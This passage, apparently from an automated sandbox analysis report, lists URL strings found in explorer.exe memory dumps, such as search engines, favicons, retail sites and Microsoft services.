Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000000D.00000000.2120734342.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000000D.00000000.2119444846.0000000004297000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000D.00000000.2111776587.00000000002BB000.00000004.00000020.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000D.00000000.2117838485.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoz
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000D.00000000.2134641767.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000000D.00000000.2114059517.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2120167931.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2118494923.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000000D.00000000.2119187998.0000000004226000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehps
Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 0000000D.00000000.2111711384.0000000000231000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpJw
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000000D.00000000.2117838485.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000D.00000002.2369452220.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000000D.00000000.2134884250.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 0000000D.00000000.2130294878.0000000008313000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 0000000D.00000000.2119554654.00000000042CB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
